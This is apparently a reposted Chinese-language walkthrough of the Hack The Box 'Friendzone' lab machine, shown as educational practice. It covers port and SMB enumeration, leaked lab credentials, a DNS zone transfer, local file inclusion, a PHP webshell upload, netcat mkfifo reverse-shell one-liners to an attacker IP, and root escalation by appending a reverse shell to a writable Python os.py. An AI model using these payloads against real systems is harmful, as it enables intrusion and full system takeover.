HTB-Friendzone靶场

admin 2022年12月19日10:38:33评论21 views字数 1263阅读4分12秒阅读模式


端口扫描

nmap -sS -Pn -n --open -T4 -p 1-65535 10.10.10.123

HTB-Friendzone靶场


HTB-Friendzone靶场


目录扫描

HTB-Friendzone靶场


HTB-Friendzone靶场


不清楚是什么,密码?cms?

smb漏洞扫描

enum4linux 10.10.10.123

HTB-Friendzone靶场


HTB-Friendzone靶场


more creds.txt

HTB-Friendzone靶场


发现了登陆密码

admin:WORKWORKHhallelujah@#

回头看,443端口是404,但是开了53端口,查看证书发现了一个域名

HTB-Friendzone靶场


HTB-Friendzone靶场


HTB-Friendzone靶场


子域名目录扫描

dirsearch https://friendzone.red/

HTB-Friendzone靶场


HTB-Friendzone靶场


base64解密也灭发现什么

又把目标转到dns上了

dig axfr friendzone.red @10.10.10.123

HTB-Friendzone靶场

这些域名写入hosts


文件包含

然后挨个尝试

HTB-Friendzone靶场


密码就是smb里查到的admin

HTB-Friendzone靶场


让访问dash文件

HTB-Friendzone靶场


有点像文件包含漏洞,读passwd 没显示

HTB-Friendzone靶场


当我读取login页面,发现成功了

HTB-Friendzone靶场


说明存在文件包含,这时登陆smb,写一个webshell,然后监听

smb写文件

但是路径不清楚,不过在前面smb漏洞扫描中发现其中有一个路径是/etc/file

HTB-Friendzone靶场


这里可使用nmap脚本进行探测

nmap --script smb-enum-shares.nse -p445 10.10.10.123

HTB-Friendzone靶场


cat cmd.php<?php systems($_REQUEST['cmd']);?>
smbclient //10.10.10.123/Development -c 'put cmd.php 1.php'

HTB-Friendzone靶场


文件包含,还是相对路径使用?传参数就不成功换成&就OK了

https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=id

HTB-Friendzone靶场


反弹shell

https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.10 7777 >/tmp/f

HTB-Friendzone靶场


HTB-Friendzone靶场

root提权

信息收集,使用pspy64 在opt下发现脚本文件

HTB-Friendzone靶场


查询可写文件

cd /usr/lib/python2.7find  -type f -writable -ls

发现os.py可写入,于是写入反弹shell命令,运行脚本,就会引用os库,就能产生反弹shell

echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py

HTB-Friendzone靶场


HTB-Friendzone靶场


总结:像HTB这种,每一个端口细节都不能放过,能渗透就都渗透一遍,常规端口不行,就全端口,一般也都是端口扫描,目录扫描,漏洞扫描,至于啥地步就看信息收集的能力了。


原文始发于微信公众号(轩公子谈技术):HTB-Friendzone靶场

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月19日10:38:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Friendzone靶场https://cn-sec.com/archives/1472111.html

发表评论

匿名网友 填写信息